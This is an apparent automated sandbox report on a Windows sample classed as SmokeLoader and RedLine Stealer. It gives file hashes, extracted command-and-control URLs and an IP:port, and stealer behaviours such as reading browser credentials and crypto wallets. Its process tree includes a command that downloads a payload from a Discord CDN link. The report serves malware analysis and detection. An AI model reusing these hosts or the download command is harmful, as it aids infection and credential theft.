Analysis
-
max time kernel
151s -
max time network
156s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
23-08-2021 13:56
Static task
static1
Behavioral task
behavioral1
Sample
f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe
Resource
win10v20210410
General
-
Target
f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe
-
Size
278KB
-
MD5
0d90e4f66414c1bc9779dbd3f776becd
-
SHA1
5abbb99c25720aaaa253d27ca6d71769b1fd1469
-
SHA256
f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2
-
SHA512
0a0a5775f0a04768be9cf20917b2a26dcd97d139dce1233745f4e37277d271bfeacaa60233bad02a1805a9db9c44bca8e4d73d83d2cff9f00fda22e35889bdfb
Malware Config
Extracted
smokeloader
2020
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
Extracted
redline
@soul3ss
188.130.139.12:30376
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\30265\soul3ss.exe family_redline C:\Users\Admin\AppData\Local\Temp\30265\soul3ss.exe family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
Processes:
1492.exeextd.exeextd.exeextd.exesoul3ss.exeextd.exepid process 3220 1492.exe 4048 extd.exe 4220 extd.exe 4172 extd.exe 4300 soul3ss.exe 4232 extd.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe upx -
Deletes itself 1 IoCs
Processes:
pid process 3008 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exepid process 4448 f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe 4448 f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3008 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exepid process 4448 f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe -
Suspicious use of AdjustPrivilegeToken 51 IoCs
Processes:
soul3ss.exedescription pid process Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeDebugPrivilege 4300 soul3ss.exe Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3008 -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
1492.execmd.exedescription pid process target process PID 3008 wrote to memory of 3220 3008 1492.exe PID 3008 wrote to memory of 3220 3008 1492.exe PID 3220 wrote to memory of 3988 3220 1492.exe cmd.exe PID 3220 wrote to memory of 3988 3220 1492.exe cmd.exe PID 3988 wrote to memory of 4048 3988 cmd.exe extd.exe PID 3988 wrote to memory of 4048 3988 cmd.exe extd.exe PID 3988 wrote to memory of 4220 3988 cmd.exe extd.exe PID 3988 wrote to memory of 4220 3988 cmd.exe extd.exe PID 3988 wrote to memory of 4172 3988 cmd.exe extd.exe PID 3988 wrote to memory of 4172 3988 cmd.exe extd.exe PID 3988 wrote to memory of 4300 3988 cmd.exe soul3ss.exe PID 3988 wrote to memory of 4300 3988 cmd.exe soul3ss.exe PID 3988 wrote to memory of 4300 3988 cmd.exe soul3ss.exe PID 3988 wrote to memory of 4232 3988 cmd.exe extd.exe PID 3988 wrote to memory of 4232 3988 cmd.exe extd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe"C:\Users\Admin\AppData\Local\Temp\f6e8f13adceaaac1b6e35e41b0f2442bbd9e11288895b4fe9b40b0f97b83d7e2.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\1492.exeC:\Users\Admin\AppData\Local\Temp\1492.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\15AE.bat C:\Users\Admin\AppData\Local\Temp\1492.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879356613826314250/soul3ss.exe" "soul3ss.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\30265\soul3ss.exesoul3ss.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\1492.exeMD5
e16f915796d4762014fc3864d4444ac3
SHA1819364784cf0d3fe440b6c9a3950de7fa093e805
SHA25665dee75f5d4f0d7e0c1065a689ebe79f67c87a4d3d9654193164128e859a0ddd
SHA5121c3721ebe22c1e9b9b5f51926d9e1bd1d26fca9b57f25161afefdeca9bdb3a1551fb4931fdbbe16df59c43c8a4eaa2131ab508a97a39cd6ddaf04003d9adca2a
-
C:\Users\Admin\AppData\Local\Temp\1492.exeMD5
e16f915796d4762014fc3864d4444ac3
SHA1819364784cf0d3fe440b6c9a3950de7fa093e805
SHA25665dee75f5d4f0d7e0c1065a689ebe79f67c87a4d3d9654193164128e859a0ddd
SHA5121c3721ebe22c1e9b9b5f51926d9e1bd1d26fca9b57f25161afefdeca9bdb3a1551fb4931fdbbe16df59c43c8a4eaa2131ab508a97a39cd6ddaf04003d9adca2a
-
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\15AE.batMD5
ca886f1ea953c266877e182b642b4fda
SHA111f08b489fe22035b7f024494a2f2351bf2b27ac
SHA256fbc6462d26860e35e523a5742f8da38cc74188ee877b9eb4679bc185aba00579
SHA512b1d00cd16eca756d57e92c22822394af3fa55f657dc36405556d82b4f3d9db7676f6bf7b01adb18679ff870867c5d2bac1dac5995a75c2d6870b84d5917fa4ba
-
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
C:\Users\Admin\AppData\Local\Temp\159C.tmp\15AD.tmp\extd.exeMD5
b019efc4814c7a73b1413a335be1fa13
SHA16e093c94cfa4a0fe25e626875f2b06a5cbc622d2
SHA256a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e
SHA512d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b
-
C:\Users\Admin\AppData\Local\Temp\30265\soul3ss.exeMD5
411ca7ba89ae45e92f9ed4663f903335
SHA16360b07844800b8e6e6e2b11ee3c8d051c4a2e96
SHA2566780a257463d037daff9f626aecee2347177edfb0851ee12d33ba225ab38f009
SHA512bfd58e96af22f17fab2cff4b360d79621b738128c61f01420963a1119d27320eb97a64fef42819e9ea7ffab39289f19b82f8911e227236435a87151d55d9e754
-
C:\Users\Admin\AppData\Local\Temp\30265\soul3ss.exeMD5
411ca7ba89ae45e92f9ed4663f903335
SHA16360b07844800b8e6e6e2b11ee3c8d051c4a2e96
SHA2566780a257463d037daff9f626aecee2347177edfb0851ee12d33ba225ab38f009
SHA512bfd58e96af22f17fab2cff4b360d79621b738128c61f01420963a1119d27320eb97a64fef42819e9ea7ffab39289f19b82f8911e227236435a87151d55d9e754
-
memory/3008-116-0x0000000000660000-0x0000000000676000-memory.dmpFilesize
88KB
-
memory/3220-117-0x0000000000000000-mapping.dmp
-
memory/3988-120-0x0000000000000000-mapping.dmp
-
memory/4048-122-0x0000000000000000-mapping.dmp
-
memory/4172-127-0x0000000000000000-mapping.dmp
-
memory/4220-125-0x0000000000000000-mapping.dmp
-
memory/4232-131-0x0000000000000000-mapping.dmp
-
memory/4300-144-0x0000000009290000-0x0000000009291000-memory.dmpFilesize
4KB
-
memory/4300-141-0x00000000067C0000-0x00000000067C1000-memory.dmpFilesize
4KB
-
memory/4300-149-0x0000000009FC0000-0x0000000009FC1000-memory.dmpFilesize
4KB
-
memory/4300-134-0x0000000000FE0000-0x0000000000FE1000-memory.dmpFilesize
4KB
-
memory/4300-136-0x0000000005D70000-0x0000000005D71000-memory.dmpFilesize
4KB
-
memory/4300-137-0x0000000006880000-0x0000000006881000-memory.dmpFilesize
4KB
-
memory/4300-138-0x00000000059F0000-0x00000000059F1000-memory.dmpFilesize
4KB
-
memory/4300-139-0x00000000059A0000-0x00000000059A1000-memory.dmpFilesize
4KB
-
memory/4300-140-0x0000000005C30000-0x0000000005C31000-memory.dmpFilesize
4KB
-
memory/4300-148-0x00000000097C0000-0x00000000097C1000-memory.dmpFilesize
4KB
-
memory/4300-142-0x0000000006760000-0x0000000006761000-memory.dmpFilesize
4KB
-
memory/4300-143-0x0000000005870000-0x0000000005D6E000-memory.dmpFilesize
5.0MB
-
memory/4300-129-0x0000000000000000-mapping.dmp
-
memory/4300-145-0x0000000009990000-0x0000000009991000-memory.dmpFilesize
4KB
-
memory/4300-146-0x0000000009210000-0x0000000009211000-memory.dmpFilesize
4KB
-
memory/4300-147-0x00000000095E0000-0x00000000095E1000-memory.dmpFilesize
4KB
-
memory/4448-115-0x0000000000400000-0x00000000023B0000-memory.dmpFilesize
31.7MB
-
memory/4448-114-0x0000000000030000-0x0000000000039000-memory.dmpFilesize
36KB